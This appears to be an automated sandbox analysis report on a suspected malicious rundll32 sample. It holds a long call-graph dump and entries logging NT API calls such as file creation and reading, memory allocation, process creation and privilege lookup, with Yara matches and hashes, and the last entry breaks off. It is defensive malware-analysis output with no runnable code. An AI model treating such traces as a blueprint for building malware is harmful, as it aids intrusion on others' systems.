99419->99420 99421 13ac20 LdrLoadDll 99420->99421 99422 13ae1f 99421->99422 99423 13ac20 LdrLoadDll 99422->99423 99424 13ae28 99423->99424 99425 13ac20 LdrLoadDll 99424->99425 99426 13ae31 99425->99426 99427 13ac20 LdrLoadDll 99426->99427 99428 13ae3a 99427->99428 99429 13ac20 LdrLoadDll 99428->99429 99430 13ae43 99429->99430 99431 13ac20 LdrLoadDll 99430->99431 99432 13ae4c 99431->99432 99433 13ac20 LdrLoadDll 99432->99433 99434 13ae58 99433->99434 99435 13ac20 LdrLoadDll 99434->99435 99436 13ae61 99435->99436 99437 13ac20 LdrLoadDll 99436->99437 99438 13ae6a 99437->99438 99439 13ac20 LdrLoadDll 99438->99439 99440 13ae73 99439->99440 99441 13ac20 LdrLoadDll 99440->99441 99442 13ae7c 99441->99442 99443 13ac20 LdrLoadDll 99442->99443 99444 13ae85 99443->99444 99445 13ac20 LdrLoadDll 99444->99445 99446 13ae91 99445->99446 99447 13ac20 LdrLoadDll 99446->99447 99448 13ae9a 99447->99448 99449 13ac20 LdrLoadDll 99448->99449 99450 13aea3 99449->99450 99451 13ac20 LdrLoadDll 99450->99451 99452 13aeac 99451->99452 99453 13ac20 LdrLoadDll 99452->99453 99454 13aeb5 99453->99454 99455 13ac20 LdrLoadDll 99454->99455 99456 13aebe 99455->99456 99457 13ac20 LdrLoadDll 99456->99457 99458 13aeca 99457->99458 99459 13ac20 LdrLoadDll 99458->99459 99460 13aed3 99459->99460 99461 13ac20 LdrLoadDll 99460->99461 99462 13aedc 99461->99462 99462->99241 99464 13af50 LdrLoadDll 99463->99464 99465 139ecc 99464->99465 99490 4432df0 LdrInitializeThunk 99465->99490 99466 139ee3 99466->99172 99468->99238 99470 13cf30 99469->99470 99471 13cf36 99469->99471 99470->99346 99472 13bf80 2 API calls 99471->99472 99473 13cf5c 99472->99473 99473->99346 99475 13cfc0 99474->99475 99476 13d01d 99475->99476 99477 13bf80 2 API calls 99475->99477 99476->99354 99478 13cffa 99477->99478 99479 13bdb0 2 API calls 99478->99479 99479->99476 99481 134324 99480->99481 99482 13bdb0 2 API calls 99480->99482 99481->99365 99482->99481 99483->99351 99485 13ac3b 99484->99485 99486 134e40 LdrLoadDll 99485->99486 99487 13ac5b 99486->99487 99488 134e40 LdrLoadDll 99487->99488 99489 13ad07 99487->99489 99488->99489 99489->99387 99490->99466 99492 4432c11 99491->99492 99493 4432c1f LdrInitializeThunk 99491->99493 99492->99247 99493->99247 99495 13a67c RtlFreeHeap 99494->99495 99496 13af50 LdrLoadDll 99494->99496 99495->99251 99496->99495 99498 127eb0 99497->99498 99499 127eab 99497->99499 99500 13bd30 2 API calls 99498->99500 99499->99180 99503 127ed5 99500->99503 99501 127f38 99501->99180 99502 139eb0 2 API calls 99502->99503 99503->99501 99503->99502 99504 127f3e 99503->99504 99508 13bd30 2 API calls 99503->99508 99513 13a5b0 99503->99513 99506 127f64 99504->99506 99507 13a5b0 2 API calls 99504->99507 99506->99180 99509 127f55 99507->99509 99508->99503 99509->99180 99511 13a5b0 2 API calls 99510->99511 99512 12817e 99511->99512 99512->99137 99514 13af50 LdrLoadDll 99513->99514 99515 13a5cc 99514->99515 99518 4432c70 LdrInitializeThunk 99515->99518 99516 13a5e3 99516->99503 99518->99516 99520 13b5b3 99519->99520 99521 12ace0 LdrLoadDll 99520->99521 99522 129c3a 99521->99522 99522->99143 99524 12b053 99523->99524 99524->99524 99526 12b0d0 99524->99526 99539 139c80 LdrLoadDll 99524->99539 99526->99150 99528 13af50 LdrLoadDll 99527->99528 99529 12f1ab 99528->99529 99529->99158 99530 13a7c0 99529->99530 99531 13a7df LookupPrivilegeValueW 99530->99531 99532 13af50 LdrLoadDll 99530->99532 99531->99154 99532->99531 99534 13a266 99533->99534 99535 13af50 LdrLoadDll 99534->99535 99536 13a26c 99535->99536 99540 4432ea0 LdrInitializeThunk 99536->99540 99537 13a28b 99537->99157 99539->99526 99540->99537 99542 12b1e0 99541->99542 99543 12b030 LdrLoadDll 99542->99543 99544 12b1f4 99543->99544 99544->99090 99546 12af24 99545->99546 99618 139c80 LdrLoadDll 99546->99618 99548 12af5e 99548->99092 99550 12f39c 99549->99550 99551 12b1b0 LdrLoadDll 99550->99551 99552 12f3ae 99551->99552 99619 12f280 99552->99619 99555 12f3e1 99557 12f3f2 99555->99557 99560 13a480 2 API calls 99555->99560 99556 12f3c9 99558 12f3d4 99556->99558 99559 13a480 2 API calls 99556->99559 99557->99095 99558->99095 99559->99558 99560->99557 99562 12f42c 99561->99562 99638 12b2a0 99562->99638 99564 12f43e 99565 12f280 3 API calls 99564->99565 99566 12f44f 99565->99566 99567 12f471 99566->99567 99568 12f459 99566->99568 99570 12f482 99567->99570 99572 13a480 2 API calls 99567->99572 99569 12f464 99568->99569 99571 13a480 2 API calls 99568->99571 99569->99098 99570->99098 99571->99569 99572->99570 99574 12ca96 99573->99574 99575 12caa0 99573->99575 99574->99106 99576 12af00 LdrLoadDll 99575->99576 99577 12cb3e 99576->99577 99578 12cb64 99577->99578 99579 12b030 LdrLoadDll 99577->99579 99578->99106 99580 12cb80 99579->99580 99581 134a40 8 API calls 99580->99581 99582 12cbd5 99581->99582 99582->99106 99584 12d636 99583->99584 99585 12b030 LdrLoadDll 99584->99585 99586 12d64a 99585->99586 99642 12d300 99586->99642 99588 12908b 99589 12cbf0 99588->99589 99590 12cc16 99589->99590 99591 12b030 LdrLoadDll 99590->99591 99592 12cc99 99590->99592 99591->99592 99593 12b030 LdrLoadDll 99592->99593 99594 12cd06 99593->99594 99595 12af00 LdrLoadDll 99594->99595 99596 12cd6f 99595->99596 99597 12b030 LdrLoadDll 99596->99597 99598 12ce1f 99597->99598 99598->99119 99672 12f6c0 99599->99672 99601 128f25 99601->99074 99602 128d14 99602->99601 99677 134390 99602->99677 99604 128d70 99604->99601 99681 128ab0 99604->99681 99607 13cf20 2 API calls 99608 128db2 99607->99608 99609 13d050 3 API calls 99608->99609 99614 128dc7 99609->99614 99610 127ea0 4 API calls 99610->99614 99613 12c7a0 18 API calls 99613->99614 99614->99601 99614->99610 99614->99613 99615 128160 2 API calls 99614->99615 99686 12f660 99614->99686 99690 12f070 21 API calls 99614->99690 99615->99614 99616->99097 99617->99116 99618->99548 99620 12f29a 99619->99620 99628 12f350 99619->99628 99621 12b030 LdrLoadDll 99620->99621 99622 12f2bc 99621->99622 99629 139f30 99622->99629 99624 12f2fe 99632 139f70 99624->99632 99627 13a480 2 API calls 99627->99628 99628->99555 99628->99556 99630 13af50 LdrLoadDll 99629->99630 99631 139f4c 99630->99631 99631->99624 99633 13af50 LdrLoadDll 99632->99633 99634 139f8c 99633->99634 99637 44335c0 LdrInitializeThunk 99634->99637 99635 12f344 99635->99627 99637->99635 99639 12b2c7 99638->99639 99640 12b030 LdrLoadDll 99639->99640 99641 12b303 99640->99641 99641->99564 99643 12d317 99642->99643 99651 12f700 99643->99651 99647 12d392 99647->99588 99648 12d38b 99648->99647 99663 13a290 LdrLoadDll 99648->99663 99650 12d3a5 99650->99588 99652 12f725 99651->99652 99664 1281a0 99652->99664 99654 12d35f 99659 13a6d0 99654->99659 99655 134a40 8 API calls 99657 12f749 99655->99657 99657->99654 99657->99655 99658 13bdb0 2 API calls 99657->99658 99671 12f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 99657->99671 99658->99657 99660 13af50 LdrLoadDll 99659->99660 99661 13a6ef CreateProcessInternalW 99660->99661 99661->99648 99663->99650 99665 12829f 99664->99665 99667 1281b5 99664->99667 99665->99657 99666 134a40 8 API calls 99668 128222 99666->99668 99667->99665 99667->99666 99669 13bdb0 2 API calls 99668->99669 99670 128249 99668->99670 99669->99670 99670->99657 99671->99657 99673 134e40 LdrLoadDll 99672->99673 99674 12f6df 99673->99674 99675 12f6e6 SetErrorMode 99674->99675 99676 12f6ed 99674->99676 99675->99676 99676->99602 99678 134394 99677->99678 99691 12f490 99678->99691 99680 1343b6 99680->99604 99682 13bd30 2 API calls 99681->99682 99683 128ad5 99682->99683 99685 128cea 99683->99685 99710 139870 99683->99710 99685->99607 99687 12f673 99686->99687 99758 139e80 99687->99758 99690->99614 99692 12f4ad 99691->99692 99698 139fb0 99692->99698 99695 12f4f5 99695->99680 99699 13af50 LdrLoadDll 99698->99699 99700 139fcc 99699->99700 99708 4432f30 LdrInitializeThunk 99700->99708 99701 12f4ee 99701->99695 99703 13a000 99701->99703 99704 13af50 LdrLoadDll 99703->99704 99705 13a01c 99704->99705 99709 4432d10 LdrInitializeThunk 99705->99709 99706 12f51e 99706->99680 99708->99701 99709->99706 99711 13bf80 2 API calls 99710->99711 99712 139887 99711->99712 99731 129310 99712->99731 99714 1398a2 99715 1398e0 99714->99715 99716 1398c9 99714->99716 99719 13bd30 2 API calls 99715->99719 99717 13bdb0 2 API calls 99716->99717 99718 1398d6 99717->99718 99718->99685 99720 13991a 99719->99720 99721 13bd30 2 API calls 99720->99721 99722 139933 99721->99722 99728 139bd4 99722->99728 99737 13bd70 LdrLoadDll 99722->99737 99724 139bb9 99725 139bc0 99724->99725 99724->99728 99726 13bdb0 2 API calls 99725->99726 99727 139bca 99726->99727 99727->99685 99729 13bdb0 2 API calls 99728->99729 99730 139c29 99729->99730 99730->99685 99732 129335 99731->99732 99733 12ace0 LdrLoadDll 99732->99733 99734 129368 99733->99734 99736 12938d 99734->99736 99738 12cf10 99734->99738 99736->99714 99737->99724 99739 12cf3c 99738->99739 99740 13a1d0 LdrLoadDll 99739->99740 99741 12cf55 99740->99741 99742 12cf5c 99741->99742 99749 13a210 99741->99749 99742->99736 99746 12cf97 99747 13a480 2 API calls 99746->99747 99748 12cfba 99747->99748 99748->99736 99750 13af50 LdrLoadDll 99749->99750 99751 13a22c 99750->99751 99757 4432ca0 LdrInitializeThunk 99751->99757 99752 12cf7f 99752->99742 99754 13a800 99752->99754 99755 13af50 LdrLoadDll 99754->99755 99756 13a81f 99755->99756 99756->99746 99757->99752 99759 13af50 LdrLoadDll 99758->99759 99760 139e9c 99759->99760 99763 4432dd0 LdrInitializeThunk 99760->99763 99761 12f69e 99761->99614 99763->99761

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 374 13a3a2-13a3a8 375 13a3aa-13a3ab 374->375 376 13a37d-13a3a1 NtCreateFile 374->376 377 13a414-13a449 call 13af50 NtReadFile 375->377 378 13a3ad-13a3c6 375->378 379 13a3cc-13a3f9 378->379 380 13a3c7 call 13af50 378->380 380->379
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00134BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00134BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0013A39D
                                                                                                                                                                  • NtReadFile.NTDLL(00134D62,5EB65239,FFFFFFFF,00134A21,?,?,00134D62,?,00134A21,FFFFFFFF,5EB65239,00134D62,?,00000000), ref: 0013A445
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CreateRead
                                                                                                                                                                  • String ID: .z`
                                                                                                                                                                  • API String ID: 3388366904-1441809116
                                                                                                                                                                  • Opcode ID: 8cb8f15fdbed3fefa713bd5509b9d167f7fed7149baae946b1e0fd33c36ebeaf
                                                                                                                                                                  • Instruction ID: c8af267a638d184f82f37cb7df09c4a943b1e35ca3a8aea1b8c7e4372435c178
                                                                                                                                                                  • Opcode Fuzzy Hash: 8cb8f15fdbed3fefa713bd5509b9d167f7fed7149baae946b1e0fd33c36ebeaf
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F21CFB6204149AFCB18DF98DC80DEB77E9AF8C358B158249FA5DD3241D630E8118BA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 424 13a34b-13a366 425 13a36c-13a3a1 NtCreateFile 424->425 426 13a367 call 13af50 424->426 426->425
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00134BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00134BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0013A39D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                  • String ID: .z`
                                                                                                                                                                  • API String ID: 823142352-1441809116
                                                                                                                                                                  • Opcode ID: 692797b44b9505386ecdb8a2d5cfb10ff4a7ca1476b4a43bad4bc2871eff0a65
                                                                                                                                                                  • Instruction ID: 03293498c754fbcae833536d0dca6a796c61fc4278de9a7eda336278710590e4
                                                                                                                                                                  • Opcode Fuzzy Hash: 692797b44b9505386ecdb8a2d5cfb10ff4a7ca1476b4a43bad4bc2871eff0a65
                                                                                                                                                                  • Instruction Fuzzy Hash: 5E01ABB2201208AFCB08CF88DC84EEB77A9BF8C754F158258BA5D97241C630E851CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00134BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00134BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0013A39D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                  • String ID: .z`
                                                                                                                                                                  • API String ID: 823142352-1441809116
                                                                                                                                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                  • Instruction ID: 2be8029a3b5f3ed0bc22ddaa67e3f2985ddf1c0757f8e46ec2a34d2ece00c968
                                                                                                                                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF0BDB2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtReadFile.NTDLL(00134D62,5EB65239,FFFFFFFF,00134A21,?,?,00134D62,?,00134A21,FFFFFFFF,5EB65239,00134D62,?,00000000), ref: 0013A445
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                  • Opcode ID: 20681f25b8ee27dd03be570ce50c174d0d765f6a9198375b12f41645dd841790
                                                                                                                                                                  • Instruction ID: 7c7180de3c7150f7103d7f35cad5e36a4b217795d9cb315aa4016c97403b6ef6
                                                                                                                                                                  • Opcode Fuzzy Hash: 20681f25b8ee27dd03be570ce50c174d0d765f6a9198375b12f41645dd841790
                                                                                                                                                                  • Instruction Fuzzy Hash: CE012DB2200104AFDB14DF98CC85EEB77ADEF8C324F058658FA6D97281C630E911CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtReadFile.NTDLL(00134D62,5EB65239,FFFFFFFF,00134A21,?,?,00134D62,?,00134A21,FFFFFFFF,5EB65239,00134D62,?,00000000), ref: 0013A445
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                  • Instruction ID: c6171e2780a746eaa842610996bbfc4cb1fcaceed2dc81ea591a75ee7b9e5b0f
                                                                                                                                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                  • Instruction Fuzzy Hash: B0F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BE5D97241D630E811CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 0013A569
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                  • Opcode ID: b0c503cb71f4790e150217c0e42f88ac549b4aef5a4aeda69672c8f75e18314f
                                                                                                                                                                  • Instruction ID: fc411d860c6f0719a0476205178cc90fe45a62f5a1d87b09a798da0022fb96c5
                                                                                                                                                                  • Opcode Fuzzy Hash: b0c503cb71f4790e150217c0e42f88ac549b4aef5a4aeda69672c8f75e18314f
                                                                                                                                                                  • Instruction Fuzzy Hash: ECF01CB5214109AFDB14EF89DC91EEB77ADAF88354F158649FE5D97242C630E810CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 0013A569
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                  • Instruction ID: 21bc104824c91c4366fc256c28a5f513fde254a676fe6d8902b5921d7770c6b0
                                                                                                                                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 51F015B2200208AFCB14DF89CC81EAB77ADAF88754F118148BE5C97241C630F810CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtClose.NTDLL(00134D40,?,?,00134D40,00000000,FFFFFFFF), ref: 0013A4A5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                  • Instruction ID: e7d0088879c293455daf381112d57c62f540d3e18d0865eb092e9c94ee0df164
                                                                                                                                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                  • Instruction Fuzzy Hash: 4FD01776200214ABD710EB98CC85EAB7BACEF48760F154499BA5C9B242C630FA0086E0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtClose.NTDLL(00134D40,?,?,00134D40,00000000,FFFFFFFF), ref: 0013A4A5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                  • Opcode ID: da806dc257014d85078951ff3cbf3225d5c70f21203b21ca54aaf9ec73ede489
                                                                                                                                                                  • Instruction ID: 6a957593bc0b2617df91a968cc03af3037daa90a4aab1a2fefa28a1df66689f4
                                                                                                                                                                  • Opcode Fuzzy Hash: da806dc257014d85078951ff3cbf3225d5c70f21203b21ca54aaf9ec73ede489
                                                                                                                                                                  • Instruction Fuzzy Hash: 23D0A7AD40D2C04FCB11EBB465D10D77F80EE512187245ECEE4EC47607D278D2199391
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 81e5de220031ef8b0c987429e71c9ac0ecaa9eba072f4f56a5f5aa1ae9c1e3ac
                                                                                                                                                                  • Instruction ID: cd7c76a578f24e8281ccf1eb5c6252a6e9a2362a7e3745030ba21729c7c5edce
                                                                                                                                                                  • Opcode Fuzzy Hash: 81e5de220031ef8b0c987429e71c9ac0ecaa9eba072f4f56a5f5aa1ae9c1e3ac
                                                                                                                                                                  • Instruction Fuzzy Hash: E490023520140842F50071584404B4600058BF0305F55C017A0126658D8759D9517521
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 9bdf33cb2795bf14df5e49ab79e0dd68dee425011808f64598c8e3e436de04e6
                                                                                                                                                                  • Instruction ID: 54b3c257ec06e448bf22b56684d6e1b42f6df48280477777d3b86288951be586
                                                                                                                                                                  • Opcode Fuzzy Hash: 9bdf33cb2795bf14df5e49ab79e0dd68dee425011808f64598c8e3e436de04e6
                                                                                                                                                                  • Instruction Fuzzy Hash: 3490023520148802F5107158840474A00058BE0305F59C412A442665CD87D9D9917121
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: c02c1f90852a9e1e1c44f7197f3411d3188a80fc729bc8bd66ac44b284cecdba
                                                                                                                                                                  • Instruction ID: d1cc67f7c7571971746ff2ec57ed6eb9353e8785aa687a14570552f594c90190
                                                                                                                                                                  • Opcode Fuzzy Hash: c02c1f90852a9e1e1c44f7197f3411d3188a80fc729bc8bd66ac44b284cecdba
                                                                                                                                                                  • Instruction Fuzzy Hash: DB90023520140402F5007598540864600058BF0305F55D012A5026559EC7A9D9916131
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: e36702207afc087a8ba1d1772650b2263acdc3ae11bfb32947241f036ab17257
                                                                                                                                                                  • Instruction ID: 91dd9a1f06a0434dc9341a83411e37e884930469c57cabae1ee72dfe74706179
                                                                                                                                                                  • Opcode Fuzzy Hash: e36702207afc087a8ba1d1772650b2263acdc3ae11bfb32947241f036ab17257
                                                                                                                                                                  • Instruction Fuzzy Hash: 7190022D21340002F5807158540860A00058BE1206F95D416A001755CCCA59D9695321
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
